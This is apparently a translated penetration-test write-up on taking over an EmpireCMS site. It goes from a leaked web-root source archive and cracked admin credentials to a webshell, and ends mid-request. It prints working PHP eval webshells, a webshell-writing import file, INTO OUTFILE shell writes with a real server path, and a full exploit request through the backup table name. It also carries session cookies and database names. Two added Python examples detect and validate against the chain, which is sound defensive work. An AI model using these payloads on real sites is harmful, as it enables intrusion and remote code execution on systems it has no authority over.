Title: A record of going from source code leak to getshell (II)

0x00 Introduction

The vulnerabilities described in this article have been submitted to the vulnerability platform, and all intrusive changes made during testing have been reverted.

0x01 Source code leak

Following the usual routine, download the source code from http://www.xxx.com.cn/www.zip and first search it for keywords to find sensitive information:

key

pwd

passwd

After searching for a long time, I could not find a valid password.

Finally, robots.txt gives away the CMS in use: EmpireCMS.

A quick search shows that it is an open-source CMS, so the database table structure can be looked up directly on Baidu.

Knowing that the administrator table is phome_enewsuser, I searched the whole source code for it.

0x02 Sensitive information leakage

Opening the hit gives the administrator username, password hash and salt value.

Cracking the MD5 directly yields the password.

The credentials are Kite/kite. With the password in hand, the next step is the backend address; since the CMS is open source, that is easily found on Baidu.

Looking at the directory shows that the backend path was not changed from the default, so it can be accessed directly:

http://www.xxx.com.cn/e/admin/

The specific version number is 6.6

0x04 Historical Vulnerability

After logging into the backend, since this is an open-source CMS, historical vulnerabilities are the key to further penetration.

Search directly for EmpireCMS vulnerabilities and start reproducing the historical ones.

1. Backend - Template - Public Template - JS Call Login Template getshell

It ended before it began:

Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist

Well now, has this table been deleted?

2. Backend - Data table and system model - Import database model getshell

There is a security vulnerability in the LoadInMod function of the e/class/moddofun.php file in EmpireCMS 7.5 and earlier. An attacker can use it to upload arbitrary files.

Create a new test.php.mod file locally with the following content:

<?php file_put_contents('lyy.php','<?php @eval($_POST[\'lyy\']);');

Fill in any table name and select Import immediately.

Another table that does not exist, GG.

3. Backend - Backup and restore data - Execute SQL statement getshell

There is a code injection vulnerability in the admindbDoSql.php file in EmpireCMS 7.5 and earlier.

That is, the backend offers a feature for executing SQL statements.

As long as the server's MySQL secure_file_priv is misconfigured, files can be written to the server.

Payload:

select '<?php @eval($_POST[123])?>' into outfile 'absolute path/e/admin/lyy.php'

Since the file has to land inside the site, the absolute path must be known.

Because the execution returns no output, the path cannot be partly recovered from the MySQL variables either, so this one is also skipped:

show variables like '%datadir%';

4. Backend - Backup and restore data - Backup data getshell

When EmpireCMS backs up the database in the backend, the database table name is not validated; by modifying the table name, arbitrary code execution can be achieved.

Select any table, start the backup and capture the request.

Change the tablename field to the payload @eval($_POST[123]). The request packet:

POST /e/admin/ebak/phome.php HTTP/1.1
Host: www.xxx.com.cn
Content-Length: 285
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xxx.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bxubwecmsdodbdata=empirectms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirectmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwlogincmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630
Connection: close

phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename%5B%5D=@eval($_POST[123])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD

The response echoes the backup folder name:

The backup folder is hdm1010482_db_20211229152350. Point the webshell client at config.php under that folder:

http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php

Getshell succeeded.

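From the defender's side, the chain in this section (fetching the archive left at the web root, POSTing to the backup module, then requesting a .php file under the backup data directory) leaves a recognisable trace in the web server's access log. The Python below is an added example, not part of the original post, that correlates those stages per client IP over constructed Apache combined-format log lines; the request paths are the ones from the post, while the client IPs (documentation ranges), timestamps and byte counts are invented. Any request for a PHP file under e/admin/ebak/bdata/ is treated as an alert on its own, since nothing legitimate fetches a generated backup config over HTTP, which is also the hardening point: that directory should not be web-served.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format log lines modelled on the write-up's
# request chain. Paths are the ones from the post; client IPs (documentation
# range), timestamps and byte counts are invented.
SAMPLE_LOG = """\
203.0.113.10 - - [29/Dec/2021:15:20:01 +0800] "GET /www.zip HTTP/1.1" 200 52428800 "-" "Mozilla/5.0"
203.0.113.10 - - [29/Dec/2021:15:21:40 +0800] "GET /robots.txt HTTP/1.1" 200 128 "-" "Mozilla/5.0"
203.0.113.10 - - [29/Dec/2021:15:22:05 +0800] "GET /e/admin/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.10 - - [29/Dec/2021:15:23:10 +0800] "POST /e/admin/ebak/phome.php HTTP/1.1" 200 1843 "http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db" "Mozilla/5.0"
203.0.113.10 - - [29/Dec/2021:15:23:55 +0800] "POST /e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php HTTP/1.1" 200 51 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Dec/2021:15:30:00 +0800] "GET /e/admin/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# ip, two ident fields, [timestamp], "METHOD path protocol", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Archive or dump sitting at the web root: the source-leak stage of the post.
ARCHIVE_RE = re.compile(r"^/[^/]+\.(?:zip|rar|7z|tar\.gz|tgz|sql|bak)$", re.I)
BACKUP_MODULE = "/e/admin/ebak/phome.php"
BACKUP_DATA_DIR = "/e/admin/ebak/bdata/"


def classify(method, path):
    """Map one request to a stage of the chain, or None if it is unremarkable."""
    path = path.split("?", 1)[0]          # ignore the query string
    if method == "GET" and ARCHIVE_RE.match(path):
        return "webroot_archive_download"
    if method == "POST" and path == BACKUP_MODULE:
        return "backup_module_post"
    if path.startswith(BACKUP_DATA_DIR) and path.lower().endswith(".php"):
        return "backup_dir_php_request"
    return None


def stages_by_ip(log_text):
    """Return {ip: set(stages)} for every client that hit at least one stage."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # malformed line: skip, do not crash
        stage = classify(m["method"], m["path"])
        if stage:
            seen[m["ip"]].add(stage)
    return dict(seen)


def alerted_clients(log_text):
    """Clients worth an alert: any PHP request under the backup data directory,
    or two or more stages of the chain from the same address."""
    return sorted(
        ip for ip, stages in stages_by_ip(log_text).items()
        if "backup_dir_php_request" in stages or len(stages) >= 2
    )


if __name__ == "__main__":
    for ip, stages in stages_by_ip(SAMPLE_LOG).items():
        print(ip, sorted(stages))
    print("alert:", alerted_clients(SAMPLE_LOG))
```

The second client only browses the backend login page and is left alone; the first trips all three stages. In production the archive pattern is worth extending with whatever backup naming your own deployment process uses.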

Principle Analysis

Since I have the source code in hand, I followed this vulnerability through the code.

First, search for config.php directly and find it.

The file write happens in Ebak_DoEbak in e/admin/ebak/class/functions.php:

// The template is a PHP single-quoted string; $d_table is concatenated into it without any quoting.
$string='<?php
$b_table=\''.$b_table.'\';
'.$d_table.'
$b_baktype='.$add['baktype'].';
$b_filesize='.$add['filesize'].';
$b_bakline='.$add['bakline'].';
$b_autoauf='.$add['autoauf'].';
$b_dbname=\''.$dbname.'\';
$b_stru='.$bakstru.';
$b_strufour='.$bakstrufour.';
$b_dbchar=\''.addslashes($add['dbchar']).'\';
$b_beover='.$beover.';
$b_insertf=\''.addslashes($insertf).'\';
$b_autofield=\','.addslashes($add['autofield']).',\';
$b_bakdatatype='.$bakdatatype.';
?>';
$cfile=$bakpath.'/'.$add['mypath'].'/config.php';
WriteFiletext_n($cfile,$string);

You can see that the $d_table variable is concatenated in directly.

Let's look at the write function WriteFiletext_n.

There is no filtering of the written content, so the only question is how to control the value of the $d_table variable.

Ctrl+click to follow it upward.

$count is the number of entries in $tablename, and $tablename is the value of the tablename key in $add.

Finding where the Ebak_DoEbak function is called shows that $add is $_POST.

Clearly, it processes the tablename POST parameter and generates two variables, $b_table and $d_table. $b_table is wrapped in double quotes and cannot be used.

$d_table, however, is not quoted and is written directly into the .php file without any filtering, resulting in code execution.

Why not another parameter?

Most other parameters are wrapped in double quotes.

The parameters that are not quoted are cast to int; if a string is passed they become 0, so they are skipped.

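The missing check the analysis above points at is input validation on tablename[] before it is interpolated into config.php, plus an integrity check on the files that were generated. The Python below is an added example, not EmpireCMS code or the post's: validate_backup_request applies the validation the backup handler should have performed (plain identifier, existing table, integer-only numeric fields, plain directory name for mypath), and suspicious_config_lines scans a generated config.php for anything other than the scalar assignments the template above produces. The captured request body is the one from the post with its & separators restored; KNOWN_TABLES, the benign request and the two config.php samples are constructed (the exact layout of the $d_table lines is not shown on the page).

```python
import re
from urllib.parse import parse_qs

# Request body from the post's captured request, with the '&' separators
# restored. The payload travels in tablename[]; baktype also carries junk.
CAPTURED_BODY = (
    "phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300"
    "&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1"
    "&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0"
    "&readme=&autofield=&tablename%5B%5D=@eval($_POST[123])&chkall=on"
)

# Constructed: the same request as a legitimate backup of one table.
BENIGN_BODY = (
    "phome=DoEbak&mydbname=hdm1010482_db&baktype=1&filesize=300&bakline=500"
    "&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1"
    "&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0"
    "&readme=&autofield=&tablename%5B%5D=phome_enewsuser&chkall=on"
)

# Constructed stand-in for SHOW TABLES; a real handler queries the database.
KNOWN_TABLES = {"phome_enewsuser", "phome_enewstempgroup"}

IDENT_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")      # plain MySQL identifier
INT_FIELDS = ("baktype", "filesize", "bakline", "autoauf", "bakstru",
              "bakdatatype", "waitbaktime")


def validate_backup_request(body, known_tables):
    """Return a list of problems; an empty list means the request is acceptable.

    The check the vulnerable handler lacked is the first one: every
    tablename[] value must be a plain identifier naming an existing table
    before anything is interpolated into config.php.
    """
    form = parse_qs(body, keep_blank_values=True)
    problems = []
    names = form.get("tablename[]", [])
    if not names:
        problems.append("no tablename[] supplied")
    for name in names:
        if not IDENT_RE.match(name):
            problems.append(f"tablename[] is not a plain identifier: {name!r}")
        elif name not in known_tables:
            problems.append(f"tablename[] is not an existing table: {name!r}")
    for key in INT_FIELDS:                 # interpolated unquoted in the template
        for value in form.get(key, []):
            if not value.isdigit():
                problems.append(f"{key} must be an integer, got {value!r}")
    for value in form.get("mypath", []):   # becomes a directory name on disk
        if not IDENT_RE.match(value):
            problems.append(f"mypath is not a plain directory name: {value!r}")
    return problems


# A generated config.php should contain only scalar assignments: an integer or
# a single-quoted string, as in the template quoted in the analysis.
CONFIG_LINE_RE = re.compile(r"^\$[A-Za-z_]\w*=(?:\d+|'(?:[^'\\]|\\.)*');$")


def suspicious_config_lines(config_php):
    """Return lines of a backup config.php that are not plain scalar assignments.

    A bare expression, a function call or a $_POST reference means the file
    was generated from unvalidated input or edited afterwards.
    """
    bad = []
    for raw in config_php.splitlines():
        line = raw.strip()
        if not line or line in ("<?php", "?>"):
            continue
        if not CONFIG_LINE_RE.match(line):
            bad.append(line)
    return bad


# Constructed samples of generated config.php files.
BENIGN_CONFIG = """<?php
$b_table='phome_enewsuser';
$b_baktype=1;
$b_filesize=300;
$b_dbname='hdm1010482_db';
$b_dbchar='gbk';
$b_autofield=',,';
?>"""

# The quoted $b_table copy is harmless; the unquoted line is live PHP.
TAMPERED_CONFIG = """<?php
$b_table='@eval($_POST[123])';
@eval($_POST[123]);
$b_baktype=1;
?>"""

if __name__ == "__main__":
    print(validate_backup_request(CAPTURED_BODY, KNOWN_TABLES))
    print(validate_backup_request(BENIGN_BODY, KNOWN_TABLES))
    print(suspicious_config_lines(TAMPERED_CONFIG))
```

The request check rejects the captured body twice over (tablename[] is not an identifier, baktype is not an integer) and accepts the benign one; the file check can be run periodically over e/admin/ebak/bdata/*/config.php as a cheap tamper detector independent of the request path.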

Follow-up on vulnerability 3

After obtaining the real path of the site through vulnerability 4, I constructed an SQL statement and tried to write a webshell directly into the site.

select '<?php phpinfo();' into outfile '/data/home/hmu072095/htdocs/e/admin/lyy.php'

Although a database connection error was thrown, the statement executed successfully; however, the written content was replaced with nothing.

The file can be accessed but has no content.

Normal characters can be written:

select 'test' into outfile '/data/home/hmu072095/htdocs/e/admin/1.txt'

The preliminary judgement is that the PHP tag is being filtered, so other ways of writing it were tried as a bypass:

1. select '<? phpinfo();' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

2. select '<script language="php">phpinfo();</script>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

3. select '<?php @eval($_POST[1])?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'

Only the last one (asp style) was written successfully.

Accessing it does not execute anything. I checked the default PHP short-tag configuration item on Linux, and that was the end of it.

Summary

1. The target site was scanned with the Yujian directory scanning tool, which revealed the exposed website backup file www.zip; the source code was downloaded locally for analysis.

2. Load the source code in PhpStorm and search for the keywords key, pwd, password, passwd; no relevant password was found. robots.txt revealed that the site runs EmpireCMS.

3. Look up the EmpireCMS table structure on Baidu; phome_enewsuser is the administrator table. A global batch search for the phome_enewsuser keyword showed that the website administrator's username and password were leaked in the source code, and the plaintext was recovered by MD5 cracking.

4. Open the default backend path /admin to reach the backend login page and log in with the obtained username and password.

5. Attempted to write a one-liner shell at backend - Template - Public Template - JS call login template; the table does not exist and the shell cannot be written.

6. At backend - System - Data table and system model - Manage data table - Import system model, with template file name test.php.mod and stored data table name phome_ecm_111; after importing, the table does not exist and the shell cannot be written.

test.php.mod:

<?php file_put_contents('lyy.php','<?php @eval($_POST[\'lyy\']);');

7. At backend - System - Backup and restore data - Execute SQL statement, write a one-liner. Prerequisites: MySQL secure_file_priv is misconfigured, the absolute path of the website is known, and the EmpireCMS version is <=7.5. The absolute path of the website could not be obtained here, so the shell could not be written.

show variables like '%datadir%'; // view the absolute path of the website

select '<?php @eval($_POST[123])?>' into outfile 'Absolute path/e/admin/lyy.php' // write a one-liner

8. In EmpireCMS 7.5 and earlier, when the database is backed up in the backend, the table name is not validated, and arbitrary code execution is possible by modifying it. At backend - System - Backup and restore data - Restore data, select any table, start the backup and intercept the request. Pay attention to the backup directory: if it does not exist, the system generates a directory name automatically. Intercept the packet, modify it, and send the request:

POST /e/admin/ebak/phome.php HTTP/1.1
Host: www.xxx.com.cn
Content-Length: 285
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xxx.com.cn
Content-Type: application/x-www-form-urlen
